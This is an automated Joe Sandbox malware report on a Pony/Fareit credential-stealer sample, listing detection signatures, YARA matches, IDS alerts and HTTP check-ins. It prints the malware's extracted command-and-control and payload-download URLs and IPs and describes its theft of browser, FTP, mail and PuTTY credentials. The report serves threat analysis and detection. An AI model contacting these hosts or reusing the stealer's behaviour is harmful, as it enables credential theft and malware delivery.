Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8WgZHDQckx.exe

Overview

General Information

Sample name:8WgZHDQckx.exe
renamed because original name is a hash value
Original sample name:2FBFC79462B64751C339F0B0297C748F.exe
Analysis ID:1570690
MD5:2fbfc79462b64751c339f0b0297c748f
SHA1:3c07b52af2661e02e4db7dc978a83db0ba7c570f
SHA256:2b7658a9c50bf8ee549193723e56b6500d4a193a5eb8e10871c67956d5d4e835
Tags:exePonyuser-abuse_ch
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • 8WgZHDQckx.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\8WgZHDQckx.exe" MD5: 2FBFC79462B64751C339F0B0297C748F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
{"C2 list": ["http://dynamotouren.de/4XM2f.exe", "http://208.116.13.164/b6dK7rwV.exe", "http://app.bi.com.tr/fPFa.exe", "http://www.aboessen24.de/WWkULwkq.exe", "http://72.32.185.12/rd7nr.exe", "http://6.magicalomaha.co/forum/viewtopic.php", "http://www.seigner-art.at/fPsx8i.exe", "http://6.magicalomaha.com/forum/viewtopic.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x26ab:$a1: \Global Downloader
      • 0x1e66:$a2: wiseftpsrvs.bin
      • 0x250b:$a3: SiteServer %d\SFTP
      • 0x24ff:$a4: %s\Keychain
      • 0x2769:$a5: Connections.txt
      • 0x2ab0:$a6: ftpshell.fsi
      • 0x320b:$a7: inetcomm server passwords
      00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0x1068:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x3252:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x88a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0xeab:$s3: POST %s HTTP/1.0
      • 0xed4:$s4: Accept-Encoding: identity, *;q=0
      • 0xfe1:$s4: Accept-Encoding: identity, *;q=0
      00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        0.2.8WgZHDQckx.exe.5a0000.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.8WgZHDQckx.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.8WgZHDQckx.exe.5a0000.1.raw.unpackJoeSecurity_PonyYara detected PonyJoe Security
              0.2.8WgZHDQckx.exe.5a0000.1.raw.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
              • 0x166ab:$a1: \Global Downloader
              • 0x15e66:$a2: wiseftpsrvs.bin
              • 0x1650b:$a3: SiteServer %d\SFTP
              • 0x164ff:$a4: %s\Keychain
              • 0x16769:$a5: Connections.txt
              • 0x16ab0:$a6: ftpshell.fsi
              • 0x1720b:$a7: inetcomm server passwords
              0.2.8WgZHDQckx.exe.400000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
                Click to see the 7 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-07T18:27:01.150098+010020144111Malware Command and Control Activity Detected192.168.2.449730208.91.197.4480TCP
                2024-12-07T18:27:07.438897+010020144111Malware Command and Control Activity Detected192.168.2.449731208.91.197.4480TCP
                2024-12-07T18:27:13.735074+010020144111Malware Command and Control Activity Detected192.168.2.449732208.91.197.4480TCP
                2024-12-07T18:27:20.047745+010020144111Malware Command and Control Activity Detected192.168.2.449736208.91.197.4480TCP
                2024-12-07T18:27:26.360110+010020144111Malware Command and Control Activity Detected192.168.2.449740208.91.197.4480TCP
                2024-12-07T18:27:32.658251+010020144111Malware Command and Control Activity Detected192.168.2.449741208.91.197.4480TCP
                2024-12-07T18:27:38.955340+010020144111Malware Command and Control Activity Detected192.168.2.449742208.91.197.4480TCP
                2024-12-07T18:27:45.250773+010020144111Malware Command and Control Activity Detected192.168.2.449743208.91.197.4480TCP
                2024-12-07T18:27:51.533770+010020144111Malware Command and Control Activity Detected192.168.2.449744208.91.197.4480TCP
                2024-12-07T18:27:58.807048+010020144111Malware Command and Control Activity Detected192.168.2.449746208.91.197.4480TCP
                2024-12-07T18:28:05.098193+010020144111Malware Command and Control Activity Detected192.168.2.449758208.91.197.4480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-07T18:27:00.133063+010020142341Malware Command and Control Activity Detected192.168.2.449881188.114.97.6443TCP
                2024-12-07T18:27:00.133063+010020142341Malware Command and Control Activity Detected192.168.2.44988372.32.185.1280TCP
                2024-12-07T18:28:59.594886+010020142341Malware Command and Control Activity Detected192.168.2.449877104.21.17.3780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-07T18:27:00.133063+010020145621A Network Trojan was detected192.168.2.449881188.114.97.6443TCP
                2024-12-07T18:27:00.133063+010020145621A Network Trojan was detected192.168.2.44988372.32.185.1280TCP
                2024-12-07T18:27:01.150098+010020145621A Network Trojan was detected192.168.2.449730208.91.197.4480TCP
                2024-12-07T18:27:07.438897+010020145621A Network Trojan was detected192.168.2.449731208.91.197.4480TCP
                2024-12-07T18:27:13.735074+010020145621A Network Trojan was detected192.168.2.449732208.91.197.4480TCP
                2024-12-07T18:27:20.047745+010020145621A Network Trojan was detected192.168.2.449736208.91.197.4480TCP
                2024-12-07T18:27:26.360110+010020145621A Network Trojan was detected192.168.2.449740208.91.197.4480TCP
                2024-12-07T18:27:32.658251+010020145621A Network Trojan was detected192.168.2.449741208.91.197.4480TCP
                2024-12-07T18:27:38.955340+010020145621A Network Trojan was detected192.168.2.449742208.91.197.4480TCP
                2024-12-07T18:27:45.250773+010020145621A Network Trojan was detected192.168.2.449743208.91.197.4480TCP
                2024-12-07T18:27:51.533770+010020145621A Network Trojan was detected192.168.2.449744208.91.197.4480TCP
                2024-12-07T18:27:58.807048+010020145621A Network Trojan was detected192.168.2.449746208.91.197.4480TCP
                2024-12-07T18:28:05.098193+010020145621A Network Trojan was detected192.168.2.449758208.91.197.4480TCP
                2024-12-07T18:28:59.594886+010020145621A Network Trojan was detected192.168.2.449877104.21.17.3780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-07T18:27:02.190465+010020139341Malware Command and Control Activity Detected192.168.2.449730208.91.197.4480TCP
                2024-12-07T18:27:08.478817+010020139341Malware Command and Control Activity Detected192.168.2.449731208.91.197.4480TCP
                2024-12-07T18:27:14.803645+010020139341Malware Command and Control Activity Detected192.168.2.449732208.91.197.4480TCP
                2024-12-07T18:27:21.096865+010020139341Malware Command and Control Activity Detected192.168.2.449736208.91.197.4480TCP
                2024-12-07T18:27:27.401407+010020139341Malware Command and Control Activity Detected192.168.2.449740208.91.197.4480TCP
                2024-12-07T18:27:33.699253+010020139341Malware Command and Control Activity Detected192.168.2.449741208.91.197.4480TCP
                2024-12-07T18:27:39.995146+010020139341Malware Command and Control Activity Detected192.168.2.449742208.91.197.4480TCP
                2024-12-07T18:27:46.290157+010020139341Malware Command and Control Activity Detected192.168.2.449743208.91.197.4480TCP
                2024-12-07T18:27:52.574602+010020139341Malware Command and Control Activity Detected192.168.2.449744208.91.197.4480TCP
                2024-12-07T18:27:59.848503+010020139341Malware Command and Control Activity Detected192.168.2.449746208.91.197.4480TCP
                2024-12-07T18:28:06.161576+010020139341Malware Command and Control Activity Detected192.168.2.449758208.91.197.4480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-07T18:27:01.150098+010020165501Malware Command and Control Activity Detected192.168.2.449730208.91.197.4480TCP
                2024-12-07T18:27:07.438897+010020165501Malware Command and Control Activity Detected192.168.2.449731208.91.197.4480TCP
                2024-12-07T18:27:13.735074+010020165501Malware Command and Control Activity Detected192.168.2.449732208.91.197.4480TCP
                2024-12-07T18:27:20.047745+010020165501Malware Command and Control Activity Detected192.168.2.449736208.91.197.4480TCP
                2024-12-07T18:27:26.360110+010020165501Malware Command and Control Activity Detected192.168.2.449740208.91.197.4480TCP
                2024-12-07T18:27:32.658251+010020165501Malware Command and Control Activity Detected192.168.2.449741208.91.197.4480TCP
                2024-12-07T18:27:38.955340+010020165501Malware Command and Control Activity Detected192.168.2.449742208.91.197.4480TCP
                2024-12-07T18:27:45.250773+010020165501Malware Command and Control Activity Detected192.168.2.449743208.91.197.4480TCP
                2024-12-07T18:27:51.533770+010020165501Malware Command and Control Activity Detected192.168.2.449744208.91.197.4480TCP
                2024-12-07T18:27:58.807048+010020165501Malware Command and Control Activity Detected192.168.2.449746208.91.197.4480TCP
                2024-12-07T18:28:05.098193+010020165501Malware Command and Control Activity Detected192.168.2.449758208.91.197.4480TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 8WgZHDQckx.exeAvira: detected
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://dynamotouren.de/4XM2f.exe", "http://208.116.13.164/b6dK7rwV.exe", "http://app.bi.com.tr/fPFa.exe", "http://www.aboessen24.de/WWkULwkq.exe", "http://72.32.185.12/rd7nr.exe", "http://6.magicalomaha.co/forum/viewtopic.php", "http://www.seigner-art.at/fPsx8i.exe", "http://6.magicalomaha.com/forum/viewtopic.php"]}
                Source: 8WgZHDQckx.exeReversingLabs: Detection: 94%
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 8WgZHDQckx.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,0_2_0040A54C
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D1E9
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree,0_2_0040CC68
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree,0_2_0040A94F
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,0_2_0040BA61
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040421D CryptUnprotectData,LocalFree,0_2_0040421D
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,0_2_0040A391
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,0_2_0040A798

                Compliance

                barindex
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeUnpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack
                Source: 8WgZHDQckx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: w:\google_prj\src\tiger4_v3_2.pdbU source: 8WgZHDQckx.exe
                Source: Binary string: w:\google_prj\src\tiger4_v3_2.pdb source: 8WgZHDQckx.exe
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00405024
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404CB4
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_0040891F
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00403FE7
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_0040966C
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_0040879B
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49758 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49740 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49740 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49740 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49758 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49758 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49743 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49743 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49743 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49743 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49741 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49736 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49736 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49736 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49740 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49736 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49732 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49731 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49731 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49741 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49732 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49732 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49758 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49731 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49731 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49742 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49741 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49732 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49877 -> 104.21.17.37:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49741 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49746 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49744 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49744 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49742 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49746 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49744 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49742 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49742 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49877 -> 104.21.17.37:80
                Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49746 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49744 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49746 -> 208.91.197.44:80
                Source: Network trafficSuricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49881 -> 188.114.97.6:443
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49881 -> 188.114.97.6:443
                Source: Network trafficSuricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.4:49883 -> 72.32.185.12:80
                Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49883 -> 72.32.185.12:80
                Source: Malware configuration extractorURLs: http://dynamotouren.de/4XM2f.exe
                Source: Malware configuration extractorURLs: http://208.116.13.164/b6dK7rwV.exe
                Source: Malware configuration extractorURLs: http://app.bi.com.tr/fPFa.exe
                Source: Malware configuration extractorURLs: http://www.aboessen24.de/WWkULwkq.exe
                Source: Malware configuration extractorURLs: http://72.32.185.12/rd7nr.exe
                Source: Malware configuration extractorURLs: http://6.magicalomaha.co/forum/viewtopic.php
                Source: Malware configuration extractorURLs: http://www.seigner-art.at/fPsx8i.exe
                Source: Malware configuration extractorURLs: http://6.magicalomaha.com/forum/viewtopic.php
                Source: Joe Sandbox ViewIP Address: 188.114.97.6 188.114.97.6
                Source: Joe Sandbox ViewIP Address: 188.114.97.6 188.114.97.6
                Source: Joe Sandbox ViewIP Address: 208.91.197.44 208.91.197.44
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: RMH-14US RMH-14US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
